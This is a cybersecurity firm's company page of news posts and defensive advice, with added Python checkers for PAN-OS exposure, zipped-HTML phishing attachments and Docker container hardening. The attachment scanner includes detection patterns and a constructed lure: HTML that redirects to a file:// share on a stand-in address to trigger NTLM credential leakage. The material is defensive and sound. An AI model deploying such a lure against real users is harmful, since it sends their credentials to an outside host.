State-Sponsored Hackers Exploit Zero-Day to Backdoor Palo Alto Networks Firewalls https://ino.to/4dj-PqO According to the cybersecurity firm, the vulnerability was identified in PAN-OS versions 10.2, 11.0 and 11.1. The company's Panorama appliances, Cloud NGFW and Prisma Access are not impacted. Palo Alto Networks says the issue exists only if both a GlobalProtect gateway and device telemetry are enabled. The company is working on patches, which will ship in PAN-OS 10.2.9-h1, 11.0.4-h1 and 11.1.2-h3 and are expected by the end of this week. In the meantime, customers can check whether a GlobalProtect gateway is configured under Network > GlobalProtect > Gateways in the firewall's web interface, and whether device telemetry is enabled under Device > Setup > Telemetry. These affected-configuration details and fix versions come from the vendor's initial notice, so re-check the current vendor advisory before deciding a device is out of scope.
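As an added example (not code from the original post or from Palo Alto Networks), the following Python turns the post's two manual checks and its fix versions into something you can run against an exported running configuration: it compares a PAN-OS version string with the fixed releases named above (10.2.9-h1, 11.0.4-h1, 11.1.2-h3), then looks for configured GlobalProtect gateways and enabled device telemetry in the config XML. The element paths and the sample configuration are assumptions about the PAN-OS config schema made for this example, not taken from the vendor advisory; the ordering rule (a release without an -h suffix sorts below its hotfixes) is the usual PAN-OS convention.

```python
import re
import xml.etree.ElementTree as ET

# Fixed releases named in the post. Anything in the same major.minor train that sorts
# below these is unpatched; trains not listed (e.g. 10.1) are not flagged.
FIXED = {"10.2": "10.2.9-h1", "11.0": "11.0.4-h1", "11.1": "11.1.2-h3"}

_VER_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_version(version):
    """'11.1.2-h3' -> (11, 1, 2, 3); a release without a hotfix sorts as hotfix 0."""
    m = _VER_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {version!r}")
    major, minor, patch, hotfix = m.groups()
    return (int(major), int(minor), int(patch), int(hotfix or 0))


def is_affected_version(version):
    """True when the version is in an affected train and older than the stated fix."""
    parsed = parse_version(version)
    train = f"{parsed[0]}.{parsed[1]}"
    return train in FIXED and parsed < parse_version(FIXED[train])


# Constructed sample of an exported running config, trimmed to the relevant nodes.
# The element paths used below are an assumption about the PAN-OS config schema made
# for this example; verify them against a real export before relying on the check.
SAMPLE_CONFIG = """<config>
  <devices><entry name="localhost.localdomain">
    <deviceconfig><system>
      <device-telemetry>
        <device-health-performance>yes</device-health-performance>
        <product-usage>yes</product-usage>
        <threat-prevention>no</threat-prevention>
      </device-telemetry>
    </system></deviceconfig>
    <vsys><entry name="vsys1">
      <global-protect>
        <global-protect-gateway>
          <entry name="GP-GW-1">
            <local-address><interface>ethernet1/1</interface></local-address>
          </entry>
        </global-protect-gateway>
      </global-protect>
    </entry></vsys>
  </entry></devices>
</config>"""


def configured_gateways(root):
    """Names of GlobalProtect gateways (what Network > GlobalProtect > Gateways lists)."""
    return [e.get("name") for e in root.findall(".//global-protect/global-protect-gateway/entry")]


def telemetry_enabled(root):
    """True if any device-telemetry category (Device > Setup > Telemetry) is set to yes."""
    node = root.find(".//deviceconfig/system/device-telemetry")
    if node is None:
        return False
    return any((child.text or "").strip().lower() == "yes" for child in node)


def assess(version, config_xml):
    """Combine the three conditions from the post into one verdict."""
    root = ET.fromstring(config_xml)
    gateways = configured_gateways(root)
    telemetry = telemetry_enabled(root)
    vulnerable_version = is_affected_version(version)
    return {
        "version_affected": vulnerable_version,
        "gateways": gateways,
        "telemetry": telemetry,
        # Exposed only when the version is unpatched AND both features are enabled.
        "exposed": vulnerable_version and bool(gateways) and telemetry,
    }


if __name__ == "__main__":
    for ver in ("10.2.8-h3", "11.1.2-h2", "11.1.2-h3"):
        print(ver, assess(ver, SAMPLE_CONFIG))
```

Run `assess()` with the sw-version reported by the device and an exported config. A device is flagged `exposed` only when all three conditions hold, matching the post's description; an unpatched version with either feature enabled is still worth scheduling for the hotfix.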
AUSCSEC Pty Ltd (Australian Cyber Security).
IT Services and IT Consulting
Canberra, ACT 98 followers
Auscsec - securing our organisations, communities and Nation.
About us
At AUSCSEC, our vision goes beyond just providing cybersecurity services. We strive to build a legacy of cyber-resilient organisations. With our expertise and dedication, we empower businesses to thrive in the face of ever-evolving cyber threats. Trust us to safeguard your digital assets and achieve long-lasting cybersecurity resilience. Together, let's shape a secure future for your organisation.
- Website
- https://www.auscsec.com.au
- Industry
- IT Services and IT Consulting
- Company size
- 2-10 employees
- Headquarters
- Canberra, ACT
- Type
- Partnership
- Founded
- 2020
Locations
- Primary: Canberra, ACT, AU
Updates
-
CISA Issues Emergency Directive After Midnight Blizzard Microsoft Hits https://ino.to/ZLMlYCy Apply stringent security measures, including strong passwords, multifactor authentication (MFA), and a prohibition on sharing unprotected sensitive information over unsecured channels.
CISA Issues Emergency Directive After Midnight Blizzard Microsoft Hits
darkreading.com
-
Australian police link "over 11,000 cybercrime incidents" to Medibank breach https://ino.to/ek1Lz2X
Key points:
PII breaches are stepping stones for criminals: this incident highlights how a single data breach can be a goldmine for attackers. Stolen personal information such as names, addresses, birthdates and even medical records can be used for a variety of criminal activities, including:
- Identity theft: criminals can use stolen information to impersonate victims and open new accounts, take out loans or make fraudulent purchases.
- Targeted phishing attacks: with personal details, attackers can craft more believable phishing emails or calls, tricking victims into revealing even more sensitive information or clicking malicious links.
- Selling data on the dark web: the stolen data itself can be sold on underground marketplaces for other criminals to exploit.
Increased workload for law enforcement: the large number of cybercrime incidents linked to the Medibank breach shows the strain such breaches put on law enforcement. It highlights the need for:
- Improved law enforcement capabilities: Victoria Police's request for better data storage and analysis tools reflects the challenges in handling the massive amount of data involved in cybercrime investigations.
- Collaboration between law enforcement and tech companies: effective investigations often require cooperation between law enforcement and tech companies to track down criminals and seize evidence stored in the cloud.
Importance of data security: this incident is a stark reminder for organisations of the importance of strong data security practices, including:
- Limiting data collection: businesses should only collect the personal information they absolutely need and dispose of it securely when it is no longer required.
- Strong access controls: implementing robust access controls to prevent unauthorised access to sensitive data is crucial.
- Staying updated on threats: organisations need to keep their systems and software up to date with the latest security patches to address vulnerabilities exploited by attackers.
Overall, the Medibank breach exemplifies the cascading effects of a major data breach and underlines the importance of robust cybersecurity measures to protect personal information.
Australian police link "over 11,000 cybercrime incidents" to Medibank breach
itnews.com.au
-
Hackers steal Windows NTLM authentication hashes in phishing attacks https://ino.to/gsgJMrC Some of the measures: Restricting guest access to SMB servers alone does not mitigate the TA577 attack, because it relies on Windows automatically authenticating to the attacker's external server, which does not require guest access. Configure a firewall to block all outbound SMB connections (typically TCP ports 445 and 139) so NTLM hashes cannot leave the network. Implement email filtering that blocks messages containing zipped HTML files, since these can trigger connections to unsafe endpoints when opened. Configure the 'Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers' Windows group policy to prevent sending NTLM hashes; this can break authentication against legitimate servers, so use its audit setting first to find which servers still depend on NTLM. For organisations on Windows 11, Microsoft has introduced an additional feature that blocks NTLM authentication over SMB, which would be an effective solution.
Hackers steal Windows NTLM authentication hashes in phishing attacks
bleepingcomputer.com
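To illustrate the email-filtering measure in the post above, the following Python is an added example (not from the original post or from the source article): it opens a zipped attachment in memory, lists any HTML members, and searches them for the file:// URLs and UNC paths that make a Windows host open an SMB session and send its NTLM credentials automatically. The lure HTML inside the sample zip is constructed for the example (203.0.113.10 is a documentation address); the exact HTML the TA577 campaign used is not reproduced here.

```python
import io
import re
import zipfile

# References that make Windows open an SMB session to the named host and authenticate
# automatically: file:// URLs (either slash style) and UNC paths.
SMB_TRIGGERS = (
    re.compile(r"""file:(?://|\\\\)+[^\s"'<>]+""", re.IGNORECASE),
    re.compile(r"""\\\\[A-Za-z0-9.\-]+\\[^\s"'<>]+"""),
)
HTML_EXTENSIONS = (".html", ".htm", ".shtml", ".xhtml")
MAX_MEMBER_BYTES = 1_000_000  # cap per member so a zip bomb cannot exhaust memory


def smb_triggers_in_html(html):
    """All file:// and UNC references found in one HTML document."""
    hits = []
    for pattern in SMB_TRIGGERS:
        hits.extend(m.group(0) for m in pattern.finditer(html))
    return hits


def scan_zip_attachment(zip_bytes):
    """Verdict for a zipped attachment.

    block    -> True when the archive carries any HTML member (the post's policy)
    smb_refs -> member name -> SMB references, the high-confidence NTLM-theft lures
    """
    verdict = {"html_members": [], "smb_refs": {}, "block": False}
    try:
        archive = zipfile.ZipFile(io.BytesIO(zip_bytes))
    except zipfile.BadZipFile:
        return verdict  # not a zip; leave it to other filters
    with archive:
        for info in archive.infolist():
            if info.is_dir() or not info.filename.lower().endswith(HTML_EXTENSIONS):
                continue
            verdict["html_members"].append(info.filename)
            with archive.open(info) as member:
                data = member.read(MAX_MEMBER_BYTES)  # reads at most this many bytes
            refs = smb_triggers_in_html(data.decode("utf-8", errors="replace"))
            if refs:
                verdict["smb_refs"][info.filename] = refs
    verdict["block"] = bool(verdict["html_members"])
    return verdict


def build_sample_zip():
    """Constructed lure, not a captured sample: HTML whose meta refresh points at a
    file:// share, the trigger the post describes."""
    lure = (
        '<html><head><meta http-equiv="refresh" '
        'content="0; url=file://203.0.113.10/share/invoice.txt"></head>'
        "<body>Loading...</body></html>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("invoice_4471.html", lure)
        archive.writestr("readme.txt", "no HTML here")
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_zip_attachment(build_sample_zip()))
```

The verdict blocks any zipped HTML, as the post recommends, and records SMB references separately so analysts can prioritise the high-confidence lures. Pair it with the host controls above: the group policy named in the post maps to the registry value RestrictSendingNTLMTraffic under HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 (1 audits, 2 denies), and running in audit mode first shows which legitimate servers would break under deny.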
-
US cyber and law enforcement agencies warn of Phobos ransomware attacks https://ino.to/p2YZodn Indicators of Compromise can be found here: https://lnkd.in/g_iqBhcy.
US cyber and law enforcement agencies warn of Phobos ransomware attacks
securityaffairs.com
-
US says China's Volt Typhoon is readying destructive cyberattacks https://ino.to/qSo2zZf
This targeting of critical infrastructure by China's Volt Typhoon group highlights the growing threat of cyberattacks on businesses of all sizes, including SMEs. Some key lessons for SMEs:
1. No organisation is immune: don't assume your size protects you. Attackers often target SMEs because of perceived weaker defences.
2. Prioritise patching: regularly update software and firmware to address vulnerabilities exploited by attackers, starting with internet-facing systems.
3. Implement MFA: multi-factor authentication adds a layer of security beyond passwords, making it harder for attackers to gain access.
4. Enable logging and monitoring: track user activity and system events to detect suspicious behaviour and potential intrusions. Store logs securely, forwarded off the host where an intruder cannot tamper with them, for analysis.
5. Stay informed: follow cybersecurity news and alerts from trusted sources to stay updated on emerging threats and mitigation strategies.
Additional recommendations:
- Conduct security assessments: identify vulnerabilities in your systems and network.
- Develop a security plan: have a documented plan for responding to cyberattacks. An Incident Response Plan (IRP) supports faster mitigation, reduced damage, improved efficiency and coordination, enhanced preparedness and reduced resource fatigue, among other benefits.
- Train employees: educate employees on cybersecurity best practices, including phishing awareness.
- Back up data regularly: regularly back up critical data to minimise the impact of ransomware or other attacks.
- Consider cyber insurance: investigate cyber insurance options to help manage financial risks.
Remember: cybersecurity is an ongoing process, not a one-time fix. By taking these steps, SMEs can significantly improve their defences against cyberattacks and protect their business.
Further resources: US Cybersecurity and Infrastructure Security Agency (CISA): https://www.cisa.gov/ Australian Cyber Security Centre (ACSC): https://www.cyber.gov.au/
US says China's Volt Typhoon is readying destructive attacks
theregister.com
-
Deepfake Video Conference Convinces Employee To Send $25 Million To Scammers https://ino.to/N5zLqW4
This case highlights the concerning rise of deepfake technology in phishing scams, with potentially devastating consequences for organisations and individuals. A breakdown of its implications for cybersecurity:
- Increased risk of spear-phishing: deepfakes provide a powerful tool for impersonation, bypassing initial trust barriers and making scams more believable. Traditional email-based phishing may now extend to video calls, further blurring the line between genuine and fraudulent interactions.
- Challenges in detection: deepfakes are becoming harder to distinguish from real video, especially under pressure or time constraints. Visual and auditory cues alone are not sufficient for reliable detection; more robust verification is needed.
- Financial and reputational losses: the Hong Kong case demonstrates the significant financial harm deepfake scams can inflict on organisations. Damage to brand reputation and potential legal repercussions add to the impact.
Recommendations for strengthening cybersecurity:
- Multi-factor authentication: implement additional verification steps beyond usernames and passwords, such as OTPs or hardware tokens.
- Security awareness training: educate employees about deepfakes, suspicious behaviour and verification protocols for high-value transactions.
- Least privilege access: limit user access to systems and data based on their specific roles and responsibilities.
- Collaboration platform security: choose secure communication platforms with features such as voice and video verification.
- Multi-level approvals: require multiple approvals for high-value transactions, especially those involving external accounts.
- Confirmation protocols: verify requests, even from seemingly familiar faces, through established, out-of-band communication channels.
- Continuous training: update training programs to address the evolving deepfake threat and empower employees to question suspicious activity.
Personal awareness: be sceptical of unexpected video calls, especially those requesting unusual actions or involving large sums of money. Verify requests through established communication channels and confirm details directly with trusted contacts. Report suspicious activity immediately to IT security or the relevant authorities.
Deepfake video conference convinces employee to send $25M to scammers
scmagazine.com
-
Chinese Coathanger malware hung out to dry by Dutch defense department https://ino.to/8RKNo1M
This incident highlights several key cybersecurity concerns:
1. Targeted attacks: this was not a random spray-and-pray campaign. Chinese state-sponsored actors specifically targeted the Dutch Ministry of Defence with custom-built malware for Fortinet firewalls, exploiting a known vulnerability (CVE-2022-42475). Organisations need to patch vulnerabilities promptly and implement layered security measures.
2. Advanced malware: Coathanger was designed to be stealthy and difficult to detect, and patching the underlying vulnerability does not remove an implant that is already in place on a device. This emphasises the importance of advanced threat detection and response capabilities.
3. Persistent access: the attackers aimed to establish persistent access within the network, allowing them to steal sensitive data and potentially launch further attacks. This underlines the need for robust segmentation and access control within networks.
4. International attribution: Dutch authorities publicly attributed the attack to Chinese state-sponsored actors, a significant step in raising awareness and potentially deterring future attacks.
5. Sharing threat intelligence: by publishing indicators of compromise (IOCs) and detection methods, the Dutch authorities are helping other organisations protect themselves from similar attacks. This collaborative approach is crucial in combating cyber threats.
Key takeaways for cybersecurity professionals:
- Patch vulnerabilities promptly. Don't wait for attackers to exploit them.
- Implement layered security. Use a range of security tools and techniques to protect your network.
- Monitor your network activity closely. Look for suspicious behaviour and investigate potential threats.
- Segment your network. This limits the damage if attackers gain access to one part of it.
- Stay informed about the latest threats.
- Share threat intelligence with others to improve collective defence.
By understanding the implications of this incident and taking proactive measures, organisations can better protect themselves from attacks like this one.
Netherlands reveals Chinese spies attacked its defense dept
theregister.com
-
Ivanti devices hit by a wave of exploits for latest security hole https://ino.to/4X8uEH7 Administrators are encouraged to review the second advisory from CISA here: https://lnkd.in/gBgFBCeM
Ivanti devices hit by exploits for yet another security hole
theregister.com
-
Leaky Vessels flaws allow hackers to escape Docker, runc containers https://ino.to/ylDs99L
In addition to applying the available security updates as soon as possible, here are some other preventative measures you can take to protect against container escape vulnerabilities like Leaky Vessels:
1. Minimise the attack surface:
- Apply the principle of least privilege: grant containers only the permissions they need to function, and avoid running containers as root unless necessary.
- Scan container images for vulnerabilities before deployment.
- Implement network segmentation to isolate containers from each other and from the host.
2. Harden the container environment:
- Use security-focused container runtimes such as gVisor or Kata Containers.
- Enable mandatory access control (MAC, e.g. AppArmor or SELinux) to restrict file system access.
- Keep the container runtime and container images up to date.
3. Monitor and detect suspicious activity:
- Implement intrusion detection and prevention (IDS/IPS) for container environments.
- Monitor container logs for unusual activity.
- Use security information and event management (SIEM) tooling to aggregate and analyse security data from across your infrastructure.
4. Stay informed:
- Subscribe to security advisories from container vendors and distributors.
- Follow industry best practices and security recommendations.
- Regularly assess your container security posture and identify potential weaknesses.
5. Implement additional security measures:
- Use secrets management tools to securely store and manage sensitive data used by containers.
- Use vulnerability scanning tools for containers to identify and address potential weaknesses.
- Consider container sandboxing solutions to further isolate containers from the host.
By implementing these measures, you can significantly reduce the risk of container escape vulnerabilities being exploited in your environment.
Leaky Vessels flaws allow hackers to escape Docker, runc containers
bleepingcomputer.com
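As an added example for the least-privilege and hardening items in the post above (not code from the original post, from Docker or from the Leaky Vessels disclosures), the following Python audits `docker inspect` output for the settings those items translate into: a non-root user, no `--privileged`, capabilities dropped, `no-new-privileges`, seccomp/AppArmor confinement left on, a read-only root filesystem, no host PID namespace and no sensitive host mounts. The two containers in the sample are constructed, one run with defaults plus `--privileged`, the other with the hardening flags; the field names follow the `docker inspect` JSON schema. Patching runc and Docker remains the actual fix for Leaky Vessels; these settings limit what an escape can reach.

```python
import json

# Constructed `docker inspect` output for two containers. Field names follow the
# docker inspect JSON schema; the container names, image and mounts are made up.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/web-weak",
        "Config": {"User": "", "Image": "nginx:1.25"},
        "HostConfig": {
            "Privileged": True, "CapAdd": ["SYS_ADMIN"], "CapDrop": [],
            "SecurityOpt": None, "ReadonlyRootfs": False, "PidMode": "host",
            "Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
        },
    },
    {
        "Name": "/web-hardened",
        "Config": {"User": "10001:10001", "Image": "nginx:1.25"},
        "HostConfig": {
            "Privileged": False, "CapAdd": None, "CapDrop": ["ALL"],
            "SecurityOpt": ["no-new-privileges:true", "seccomp=default.json"],
            "ReadonlyRootfs": True, "PidMode": "", "Binds": None,
        },
    },
])

# Host paths that hand a container control of the host when bind-mounted.
SENSITIVE_MOUNTS = ("/", "/var/run/docker.sock", "/proc", "/sys", "/etc", "/root")


def runs_as_root(user):
    """Config.User is '' (defaults to root), 'root', '0', or 'user:group'."""
    name = (user or "").strip().split(":", 1)[0]
    return name in ("", "root", "0")


def mounts_sensitive_path(bind):
    """True for a HostConfig.Binds entry whose host side is a sensitive path or under one."""
    src = bind.split(":", 1)[0]
    return src in SENSITIVE_MOUNTS or any(
        src.startswith(p + "/") for p in SENSITIVE_MOUNTS if p != "/"
    )


def audit_container(container):
    """Findings for one docker inspect entry; an empty list passes every check."""
    cfg = container.get("Config") or {}
    host = container.get("HostConfig") or {}
    findings = []
    if runs_as_root(cfg.get("User")):
        findings.append("runs as root (set --user to an unprivileged UID)")
    if host.get("Privileged"):
        findings.append("--privileged grants every capability and host device access")
    if host.get("CapAdd"):
        findings.append("adds capabilities: " + ", ".join(host["CapAdd"]))
    if "ALL" not in (host.get("CapDrop") or []):
        findings.append("keeps Docker's default capability set (use --cap-drop ALL)")
    secopt = host.get("SecurityOpt") or []
    if not any(o.startswith("no-new-privileges") for o in secopt):
        findings.append("no-new-privileges not set (setuid binaries can escalate)")
    if any(o in ("seccomp=unconfined", "apparmor=unconfined") for o in secopt):
        findings.append("seccomp or AppArmor confinement disabled")
    if not host.get("ReadonlyRootfs"):
        findings.append("writable root filesystem (use --read-only)")
    if host.get("PidMode") == "host":
        findings.append("shares the host PID namespace")
    for bind in host.get("Binds") or []:
        if mounts_sensitive_path(bind):
            findings.append("mounts sensitive host path " + bind.split(":", 1)[0])
    return findings


def audit_inspect_output(inspect_json):
    """Map container name -> findings for the JSON array that docker inspect prints."""
    return {c["Name"].lstrip("/"): audit_container(c) for c in json.loads(inspect_json)}


if __name__ == "__main__":
    for name, findings in audit_inspect_output(SAMPLE_INSPECT).items():
        print(name, "OK" if not findings else "")
        for finding in findings:
            print("  -", finding)
```

Feed it the output of `docker inspect $(docker ps -q)`; an empty finding list means the container passes. The corresponding run flags are `--user`, `--cap-drop ALL`, `--security-opt no-new-privileges`, `--read-only`, and leaving out `--privileged`, `--pid host` and the Docker socket mount.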